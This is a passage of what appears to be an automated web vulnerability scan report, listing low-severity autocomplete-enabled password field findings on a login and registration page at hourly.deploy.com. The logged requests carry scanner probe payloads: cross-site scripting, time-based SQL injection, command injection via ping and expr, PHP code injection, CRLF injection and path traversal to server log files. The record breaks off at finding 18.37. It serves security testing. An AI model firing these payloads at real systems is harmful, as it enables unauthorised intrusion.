The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=javascript:netsparker(0x00002E) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:47 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=javascript:netsparker(0x00002e)" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.20. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000008%2529%253C%252Fscript%253E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.21. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.22. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=javascript:netsparker(0x000035) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=javascript:netsparker(0x000035)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.23. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.24. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.25. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.26. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../etc/httpd/logs/error_log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.27. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.28. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.29. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=1%20ns=netsparker(0x000017)%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000017)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.30. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26%20SET%20%2FA+0xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.31. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.32. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.33. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.34. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.35. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.36. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=body%7Bx:expression(netsparker(0x000041))%7D HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:50 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=body%7bx:expression(netsparker(0x000041))%7d" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.37. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

